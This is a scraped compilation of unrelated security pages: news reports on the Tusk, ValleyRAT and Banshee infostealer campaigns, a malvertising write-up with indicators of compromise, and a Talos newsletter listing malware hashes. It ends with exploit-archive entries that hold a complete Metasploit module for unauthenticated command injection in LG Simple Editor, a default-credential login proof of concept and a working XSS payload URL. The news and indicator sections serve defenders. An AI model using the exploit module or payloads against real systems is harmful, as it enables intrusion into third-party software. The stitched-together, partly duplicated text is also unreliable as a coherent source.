Cybersecurity researchers have shed light on a sophisticated information stealer campaign that impersonates legitimate brands to distribute malware like DanaBot and StealC.
The activity cluster, orchestrated by Russian-speaking cybercriminals and collectively codenamed Tusk, is said to encompass several sub-campaigns, leveraging the reputation of the platforms to trick users into downloading the

Cybersecurity researchers have shed light on a sophisticated information stealer campaign that impersonates legitimate brands to distribute malware like DanaBot and StealC.

The activity cluster, orchestrated by Russian-speaking cybercriminals and collectively codenamed Tusk, is said to encompass several sub-campaigns, leveraging the reputation of the platforms to trick users into downloading the malware using bogus sites and social media accounts.

"All the active sub-campaigns host the initial downloader on Dropbox," Kaspersky researchers Elsayed Elrefaei and AbdulRhman Alfaifi said. "This downloader is responsible for delivering additional malware samples to the victim's machine, which are mostly info-stealers (DanaBot and StealC) and clippers."

Of the 19 sub-campaigns identified to date, three are said to be currently active. The name "Tusk" is a reference to the word "Mammoth" used by the threat actors in log messages associated with the initial downloader. It's worth noting that mammoth is a slang term often used by Russian e-crime groups to refer to victims.

The campaigns are also notable for employing phishing tactics to deceive victims into parting with their personal and financial information, which is then sold on the dark web or used to gain unauthorized access to their gaming accounts and cryptocurrency wallets.

The first of the three sub-campaigns, known as TidyMe, mimics peerme\[.\]io with a lookalike site hosted on tidyme\[.\]io (as well as tidymeapp\[.\]io and tidyme\[.\]app) that solicits a click to download a malicious program for both Windows and macOS systems that's served from Dropbox.

The downloader is an Electron application that, when launched, prompts the victim to enter the CAPTCHA displayed, after which the main application interface is displayed, while two additional malicious files are covertly fetched and executed in the background.

Both the payloads observed in the campaign are Hijack Loader artifacts, which ultimately launch a variant of the StealC stealer malware with capabilities to harvest a wide range of information.

RuneOnlineWorld ("runeonlineworld\[.\]io"), the second sub-campaign, involves the use of a bogus website simulating a massively multiplayer online (MMO) game named Rise Online World to distribute a similar downloader that paves the way for DanaBot and StealC on compromised hosts.

Also distributed via Hijack Loader in this campaign is a Go-based clipper malware that's designed to monitor clipboard content and substitute wallet addresses copied by the victim with an attacker-controlled Bitcoin wallet to perform fraudulent transactions.

Rounding off the active campaigns is Voico, which impersonates an AI translator project called YOUS (yous\[.\]ai) with a malicious counterpart dubbed voico\[.\]io in order to disseminate an initial downloader that, upon installation, asks the victim to fill out a registration form containing their credentials and then logs the information on the console.

The final payloads exhibit similar behavior as that of the second sub-campaign, the only distinction being the StealC malware used in this case communicates with a different command-and-control (C2) server.

"The campaigns \[...\] demonstrate the persistent and evolving threat posed by cybercriminals who are adept at mimicking legitimate projects to deceive victims," the researchers said. "The reliance on social engineering techniques such as phishing, coupled with multistage malware delivery mechanisms, highlights the advanced capabilities of the threat actors involved."

"By exploiting the trust users place in well-known platforms, these attackers effectively deploy a range of malware designed to steal sensitive information, compromise systems, and ultimately achieve financial gain."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Using Fake Brand Sites to Spread DanaBot and StealC Malware

Chinese-speaking users are the target of an ongoing campaign that distributes malware known as ValleyRAT.
"ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and deploy arbitrary plugins to cause further damage," Fortinet FortiGuard Labs researchers Eduardo Altares and Joie Salvio said.
"Another noteworthy characteristic of this malware is its

Chinese-speaking users are the target of an ongoing campaign that distributes malware known as ValleyRAT.

"ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and deploy arbitrary plugins to cause further damage," Fortinet FortiGuard Labs researchers Eduardo Altares and Joie Salvio said.

"Another noteworthy characteristic of this malware is its heavy usage of shellcode to execute its many components directly in memory, significantly reducing its file footprint in the victim's system."

Details about the campaign first emerged in June 2024, when Zscaler ThreatLabz detailed attacks involving an updated version of the malware.

Exactly how the latest iteration of ValleyRAT is distributed is currently not known, although previous campaigns have leveraged email messages containing URLs pointing to compressed executables.

The attack sequence is a multi-stage process that starts with a first-stage loader that impersonates legitimate applications like Microsoft Office to make them appear harmless (e.g., "工商年报大师.exe" or "补单对接更新记录txt.exe").

Launching the executable causes the decoy document to be dropped and the shellcode to be loaded for advancing to the next phase of the attack. The loader also takes steps to validate that it's not running in a virtual machine.

The shellcode is responsible for initiating a beaconing module that contacts a command-and-control (C2) server to download two components – RuntimeBroker and RemoteShellcode – alongside setting persistence on the host and gaining administrator privileges by exploiting a legitimate binary named fodhelper.exe and achieve a UAC bypass.

The second method used for privilege escalation concerns the abuse of the CMSTPLUA COM interface, a technique previously adopted by threat actors connected to the Avaddon ransomware and also observed in recent Hijack Loader campaigns.

In a further attempt to make sure that the malware runs unimpeded on the machine, it configures exclusion rules to Microsoft Defender Antivirus and proceeds to terminate various antivirus-related processes based on matching executable filenames.

RuntimeBroker's primary task is to retrieve from the C2 server a component named Loader, which functions the same way as the first-stage loader and executes the beaconing module to repeat the infection process.

The Loader payload also exhibits some distinct characteristics, including carrying out checks to see if it's running in a sandbox and scanning the Windows Registry for keys related to apps like Tencent WeChat and Alibaba DingTalk, reinforcing the hypothesis that the malware exclusively targets Chinese systems.

On the other hand, RemoteShellcode is configured to fetch the ValleyRAT downloader from the C2 server, which, subsequently, uses UDP or TCP sockets to connect to the server and receive the final payload.

ValleyRAT, attributed to a threat group called Silver Fox, is a fully-featured backdoor capable of remotely controlling compromised workstations. It can take screenshots, execute files, and load additional plugins on the victim system.

"This malware involves several components loaded in different stages and mainly uses shellcode to execute them directly in memory, significantly reducing its file trace in the system," the researchers said.

"Once the malware gains a foothold in the system, it supports commands capable of monitoring the victim's activities and delivering arbitrary plugins to further the threat actors' intentions."

The development comes amid ongoing malspam campaigns that attempt to exploit an old Microsoft Office vulnerability (CVE-2017-0199) to execute malicious code and deliver GuLoader, Remcos RAT, and Sankeloader.

"CVE-2017-0199 is still targeted to allow for execution of remote code from within an XLS file," Broadcom-owned Symantec said. "The campaigns delivered a malicious XLS file with a link from which a remote HTA or RTF file would be executed to download the final payload."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics

Cybersecurity researchers have uncovered new stealer malware that's designed to specifically target Apple macOS systems.
Dubbed Banshee Stealer, it's offered for sale in the cybercrime underground for a steep price of $3,000 a month and works across both x86_64 and ARM64 architectures. 
"Banshee Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser

Malware / Browser Security

Cybersecurity researchers have uncovered new stealer malware that's designed to specifically target Apple macOS systems.

Dubbed Banshee Stealer, it's offered for sale in the cybercrime underground for a steep price of $3,000 a month and works across both x86\_64 and ARM64 architectures.

"Banshee Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat," Elastic Security Labs said in a Thursday report.

The web browsers and crypto wallets targeted by the malware comprise Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Vivaldi, Yandex, Opera, OperaGX, Exodus, Electrum, Coinomi, Guarda, Wasabi Wallet, Atomic, and Ledger.

It's also equipped to harvest system information and data from iCloud Keychain passwords and Notes, as well as incorporate a slew of anti-analysis and anti-debugging measures to determine if it's running in a virtual environment in an attempt to evade detection.

Furthermore, it makes use of the CFLocaleCopyPreferredLanguages API to avoid infecting systems where Russian is the primary language.

Like other macOS malware strains such as Cuckoo and MacStealer, Banshee Stealer also leverages osascript to display a fake password prompt to trick users into entering their system passwords for privilege escalation.

Among the other notable features include the ability to collect data from various files matching .txt, .docx, .rtf, .doc, .wallet, .keys, and .key extensions from the Desktop and Documents folders. The gathered data is then exfiltrated in a ZIP archive format to a remote server ("45.142.122\[.\]92/send/").

"As macOS increasingly becomes a prime target for cybercriminals, Banshee Stealer underscores the rising observance of macOS-specific malware," Elastic said.

The disclosure comes as Hunt.io and Kandji detailed another macOS stealer strain that leverages SwiftUI and Apple's Open Directory APIs for capturing and verifying passwords entered by the user in a bogus prompt displayed in order to complete the installation process.

"It begins by running a Swift-based dropper that displays a fake password prompt to deceive users," Broadcom-owned Symantec said. "After capturing credentials, the malware verifies them using the OpenDirectory API and subsequently downloads and executes malicious scripts from a command-and-control server."

This development also follows the continued emergence of new Windows-based stealers such as Flame Stealer, even as fake sites masquerading as OpenAI's text-to-video artificial intelligence (AI) tool, Sora, are being used to propagate Braodo Stealer.

Separately, Israeli users are being targeted with phishing emails containing RAR archive attachments that impersonate Calcalist and Mako to deliver Rhadamanthys Stealer.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Banshee Stealer Targets 100+ Browser Extensions on Apple macOS Systems

In a clever scheme designed to abuse Google in more than one way, scammers are redirecting users to browser locks.

In a previous blog, we saw criminals distribute malware via malicious ads for Google Authenticator. This time, brazen malvertisers went as far as impersonating Google’s entire product line and redirecting victims to a fake Google home page.

Clearly not afraid of poking the bear, they even used and abused yet another Google product, Looker Studio, to lock up the browser of Windows and Mac users alike.

We describe how they were able to achieve this, relying almost exclusively on stolen or free accounts and leveraging Google’s APIs to create rotating malicious URLs for the browser lock.

All malicious activities described in this blog have been reported to Google. Malwarebytes customers were proactively protected against this attack via the Malwarebytes Browser Guard extension.

**Malvertising {keyword:google)**

The following image is a collage of malicious ads that all came from Google searches each consisting of two keywords: **google {product}**. They all tie back to the same advertiser, which we believe may be unaware that their account was compromised. In fact, we previously saw that same advertiser in two other unrelated incidents at the end of June 2024 for Brave (malware download) and Tonkeeper (phishing).

_Figure 1: Google search ads for respective Google products_

While brand impersonation is commonly done via tracking templates, in this instance the fraudsters relied on keyword insertion to do the work for them. This is particularly useful when targeting a single company and its entire portfolio. Notice how all the ads follow the same pattern with a display URL showing _lookerstudio.google.com_ (a Google product also later abused in this scheme).

Shortly after we reported this initial wave of ads, we saw the same scammers (the final URL after clicking on the ad is also going to _lookerstudio.google.com_) register a new advertiser account. In this case, despite their identity not having been verified yet, their ad still showed up for a standard “google maps” search. This time, the ad’s display URL mirrors the product (maps.google.com):

_Figure 2: A malicious ad for Google maps from a yet to be verified advertiser account_

**Fake Google Search page via Looker Studio**

Originally intended as a tool to convert data into dashboards, the scammers are misusing Looker Studio to display a dynamically generated image instead. The image is stretched across the screen to give the illusion that you are at the Google home page, ready to make a new search.

_Figure 3: A fake Google home page, displayed via Looker Studio rendering an image_

Opening Developer Tools in Chrome, we can see that the “Google search page” is indeed just one large image:

_Figure 4: The actual image for the so-called Google home page_

What’s interesting is how this image is used as a lure that requires some user interaction to trigger an action. Leveraging the Looker Studio API, the scammers are embedding a hidden hyperlink that will be launched as a new tab when a victims clicks on the image:

_Figure 5: Looking at network request, we find a hidden URL_

**Tech support scam**

The embedded linkUrl _cddssddds434334\[.\]z13\[.\]web\[.\]core\[.\]windows\[.\]net_ redirects to a fake Microsoft or Apple alert page that will attempt to hijack the browser by going in full screen mode and play a recording. These fake alerts are the most common way innocent people fall victims to tech support scams. In such a situation, many people will assume there is something wrong their computer and will follow the instructions they are given on screen.

Calling the phone number for assistance will kickstart a conversation with a call center often located overseas. Fake Microsoft or Apple representatives will persuade victims to buy gift cards or log into their bank account to pay for the ‘repairs’.

_Figure 6: Tech support browser lock page for Windows users_

_Figure 7: Tech support browser lock page for Mac users_

The scam URL is part of _web\[.\]core\[.\]windows\[.\]net_ which belongs to Microsoft Azure and is commonly abused by scammers. In this particular instance, the Looker Studio API provides a new malicious URL (rotated at regular intervals) to make any blocking via conventional means futile.

**Conclusion**

As we saw in this blog, malicious ads can be combined with a number of tricks to evade detection from Google and defenders in general. Dynamic keyword insertion can be abused to target a larger audience related to the same topic, which in this case was Google’s products.

Finally, it’s worth noting that in this particular scheme, all web resources used from start to finish are provided by cloud providers, often free of charge. That means more flexibility for the criminals while increasing difficulty to block.

As we were investigating this campaign, we checked that Malwarebytes customers were protected. Despite the malicious URLs being hosted on Microsoft Azure and rotating regularly, Malwarebytes Browser Guard was already blocking this attack thanks to its heuristics engine.

**Indicators of Compromise**

Google advertiser accounts

08141293921851408385  
Dhruv  
06037672575822200833

Looker Studio URLs

lookerstudio\[.\]google\[.\]com/embed/reporting/fa7aca93-cabd-47bf-bae3-cb5e299c8884/  
lookerstudio\[.\]google\[.\]com/embed/reporting/42b6f86d-2a06-4b38-9f94-808a75572bb8/  
lookerstudio\[.\]google\[.\]com/embed/reporting/fbd88a24-af73-4c76-94dc-5c55345e291d/

 Dozens of Google products targeted by scammers via malicious search ads 

Voting Village co-founder Harri Hursti told Politico the list of vulnerabilities ran “multiple pages.”

Thursday, August 15, 2024 14:00

As promised, I’m back this week to recap some of the top stories coming out of Black Hat and DEF CON.  

Also as promised, AI was the talk of Vegas during Hacker Summer Camp (or at least from what I’ve been reading and hearing, I wasn’t there in person). 

Several exhibitions and talks at both conferences showed how easy it is to create deepfake videos and potentially use them to spread fake news and disinformation. Two security researchers worked to deepfake themselves and even managed to trick people into believing it really was them on one end of a video conference call.  

Others on the show floor had the opportunity to try their hand at creating deepfakes with the help of the Defense Advanced Research Projects Agency (DARPA). One standout example was a fake video of former Royal Family member Meghan Markle being transposed onto the face of a reporter who could then speak in an approximation of Markle’s voice to say whatever she wanted to. 

The good news is that, for now, these types of deepfakes are also incredibly easy for tools and humans alike to detect.  

For example, Adobe’s Content Authenticity Initiative is working to place labels on images to indicate that they were originally human-made, and clicking on the image would allow the user to read more information about that image’s history and where and how it had been created. 

And in the case of the Meghan Markle deepfake, the SemaFor tool on display at the DEF CON village appropriately detected the image as fake using its scoring system (it didn’t help that the deepfake creator couldn’t account for the fact that the “creator” was wearing glasses).  

Security researchers also used DEF CON and Black Hat to show where potential security pitfalls lie with the rise of AI tools and software. 

One talk centered around how Microsoft’s AI Copilot could essentially be turned into an “automated phishing machine” by leaking personal information, and other researchers warned about an over-reliance on learned language models (LLMs) to write software code that often includes vulnerabilities and errors. 

Over in the DEF CON Voting Village, security researchers found their usual swath of vulnerabilities that could be used against popular voting machines and other hardware that will likely be used in the 2024 U.S. presidential election. While we don’t have many details on the specific vulnerabilities found, Voting Village co-founder Harri Hursti told Politico the list of vulnerabilities ran “multiple pages.” 

There are a few issues that came to light for me when I was reading about this research and bug hunting: One is that there isn’t enough time to implement many of these fixes before the November election, and there are just so many different pieces of equipment and manufacturers that it’s impossible to properly inspect all these devices. I may feel compelled to write more about this later, but it’s interesting to me that we as a country have managed to decide on essentially two cell phone manufacturers that we’re willing to buy from: Apple and Google. Yet there is no standard for the types, age and vendors that we rely on for our elections, and when they’re not in use, they just sit in storage.  

**The one big thing **

This month’s Microsoft Patch Tuesday includes updates for security vulnerabilities in Office, Visual Studio, Azure, CoPilot, Teams and more. Of the six zero-day vulnerabilities Microsoft disclosed as part of its regular patching cadence, half are local privilege escalation vulnerabilities, meaning adversaries could combine them with other flaws to make their attack more serious or with higher-level privileges. Cisco Talos’ Vulnerability Research team discovered four of the vulnerabilities Microsoft patched this week: CVE-2024-38184, CVE-2024-38185, CVE-2024-38186 and CVE-2024-38187. These are elevation of privilege vulnerabilities in the Microsoft Windows kernel-mode driver that could allow an attacker to gain SYSTEM-level privileges. Talos researchers also discovered eight vulnerabilities in CLIPSP.SYS, a driver used to implement Client License System Policy on Windows 10 and 11. 

**Why do I care? **

Talos discovered three issues, TALOS-2024-1971 (CVE-2024-38062) and TALOS-2024-1970 (CVE-2024-38062) and TALOS-2024-1969 (CVE-2024-38187), an adversary could exploit by sending the targeted system a specially crafted license blob, which could lead to a denial of service. TALOS-2024-1964 (CVE-2024-38184) is exploited in the same way, but in this case, could allow the adversary to bypass the usual security checks that take place and allow them to tamper with the license. By tampering with the license, an adversary could change its properties such as when the license expires, or even create a new license that could then be used with other applications downloaded from the Windows store. Two other out-of-bounds write vulnerabilities, TALOS-2024-1966 (CVE-2024-38186) and TALOS-2024-1988 (CVE-2024-38062), could lead to privilege escalation. And in both cases, the vulnerable functions could play into a sandbox escape attack. 

Microsoft also issued a patch for a zero-day vulnerability that was already being exploited in the wild and publicly disclosed. The company warned of CVE-2024-38200 last week, which could lead to the unauthorized disclosure of sensitive information to malicious actors. 

**So now what? **

Talos released a new Snort rule set that detects attempts to exploit some of the vulnerabilities disclosed Tuesday. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63858 – 63861 and 63864 - 63878. There are also Snort 3 rules 300980 – 300988. Talos’ Vulnerability Roundup also has technical details on the eight CLIPSP.SYS vulnerabilities. 

**Top security headlines of the week **

**Secure messaging app Signal is now blocked in Venezuela and Russia, limiting a popular communication channel for activists and protestors in those countries.** In Russia, government officials have said that the app violates the country’s privacy legislation, while in Venezuela, the block comes after weeks of protests over the country’s disputed presidential election results. Signal is a popular option for users looking for encrypted messaging or hoping to avoid government censorship. The app told users that they could circumvent these blocks by turning on the app’s “censorship circumvention” settings or using a VPN to create a new account. Venezuela’s ruling party has also ordered that access to X/Twitter be restricted for 10 days, and YouTube also experienced a widespread outage in Russia that the company said was “not as a result of any technical issues on our side or action taken by us.” (The Verge, Engadget) 

**The FBI has shut down dozens of servers and the main leak site associated with the Radar ransomware group (aka Dispossessor).** Radar started out as a threat actor known for taking data stolen by the LockBit ransomware operators and offering it for sale on dark web forums, but eventually became its own self-sufficient ransomware operation. In a press release announcing the takedown over the weekend, the FBI said that Radar particularly focused on small-to-mid-sized businesses and organizations from the production, education, healthcare, financial services and transportation sectors. They identified 43 victims across the U.S., U.K., Argentina, Australia, Brazil, Canada, Poland, Germany and more. The group’s infrastructure included three servers in the U.S., three servers in the U.K., 18 servers in Germany, and eight U.S.-based domains, all of which were seized and displayed a takedown message from the FBI at the time of the takedown. (Dark Reading, Inc.) 

**The head of the U.S. Cybersecurity and Infrastructure Security Agency used her time at the Black Hat conference to call on software makers to adopt a security-by-design practice.** Jen Easterly, speaking in the keynote section of one of the largest cybersecurity conferences in the world, said that “We don’t have a cybersecurity problem, we have a software quality problem.” Easterly said many technology companies have voluntarily adopted CISA’s secure-by-design standards, which pledges to bake cybersecurity and vulnerability reviews into the design process of all new hardware and software products. “The cybersecurity industry was created to solve a problem created by another set of vendors, the technology companies and software makers. For decades tech vendors have been allowed to create insecure software,” she said. She also called on Congress to establish what she called a “liability regime” to hold companies responsible for designing insecure products and providing support to companies that due adhere to cybersecurity standards. (Inside AI Policy, CyberScoop)  

**Can’t get enough Talos? **

*   A refresher on Talos’ open-source tools and the importance of the open-source community 
*   Current attacks, targets, and other threat landscape trends 
*   As AI transforms cybersecurity, Cisco’s Martin Lee has only one piece of advice for IT managers: expect the unexpected 
*   Cisco Integrated Talos Threat Intelligence for All Splunk Users 

**Upcoming events where you can find Talos **

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**_LABScon_** **_(Sept. 18 - 21)_** 

_Scottsdale, Arizona_

**_VB2024_** **_(Oct. 2 - 4)_**

_Dublin, Ireland_

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

AI, election security headline discussions at Black Hat and DEF CON

LG Simple Editor versions 3.21.0 and below suffer from an unauthenticated command injection vulnerability. The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'LG Simple Editor Command Injection (CVE-2023-40504)',        'Description' => %q{          Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'Michael Heinzl' # MSF module        ],        'References' => [          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1208/'],          [ 'CVE', '2023-40504']        ],        'DisclosureDate' => '2023-08-04',        'Platform' => 'win',        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Windows_Fetch',            {              'Arch' => [ ARCH_CMD ],              'Platform' => 'win',              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },              'Type' => :win_fetch,              'Payload' => {                'BadChars' => '\\'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])      ]    )  end  # Determine if the Simple Editor instance runs a vulnerable version  # copied from lg_simple_editor_rce.rb  def check    res = send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')      }    )    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')    Exploit::CheckCode::Safe  end  def exploit    execute_command(payload.encoded)  end  def execute_command(cmd)    print_status('Sending command injection...')    exec_simplerce(cmd)    print_status('Exploit finished, check thy shell.')  end  # Send command injection  def exec_simplerce(cmd)    filename = Rex::Text.rand_text_alpha(1..6)    vprint_status("Using random filename: #{filename}.mp4")    form = Rex::MIME::Message.new    form.add_part('/', nil, nil, "form-data; name=\"uploadVideo\"; filename=\"#{filename}.mp4\"")    form.add_part("/\"&#{cmd}&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"')    form.add_part('1', nil, nil, 'form-data; name="uploadFile_x"')    form.add_part('1', nil, nil, 'form-data; name="uploadFile_width"')    form.add_part('1', nil, nil, 'form-data; name="uploadFile_height"')    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadVideo.do'),        'ctype' => "multipart/form-data; boundary=#{form.bound}",        'data' => form.to_s      }    )    if res && res.code == 200      print_good 'Command injection sent.'    else      fail_with(Failure::UnexpectedReply, "#{peer}: Unexpected response received.")    end  endend

LG Simple Editor 3.21.0 Command Injection

Feberr version 13.4 suffers from an ignored default credential vulnerability.

**Feberr 13.4 Insecure Settings**

Posted Aug 15, 2024

Authored by indoushka

Feberr version 13.4 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2e393c441ce609493774dac1c3e5f681c5ce98d1b3702bb114041fdb03335768

Download | Favorite | View

**Feberr 13.4 Insecure Settings**

    ====================================================================================================================================| # Title     : Feberr v13.4 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user&pass: admin[+] https://www/127.0.0.1/nexuscriptscom/admin/pwa-settingsGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Feberr 13.4 Insecure Settings

Farmacia Gama version 1.0 suffers from a cross site scripting vulnerability.

**Farmacia Gama 1.0 Cross Site Scripting**

Posted Aug 15, 2024

Authored by indoushka

Farmacia Gama version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2caf36ad25ddb5e5fcd4a26fd8ac2e62e0dee3d76fbd95e698130d2b8730632e

Download | Favorite | View

**Farmacia Gama 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 XSS Vulnerability                                                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendas[+] http://127.0.0.1/farmacia-master/main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendasGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
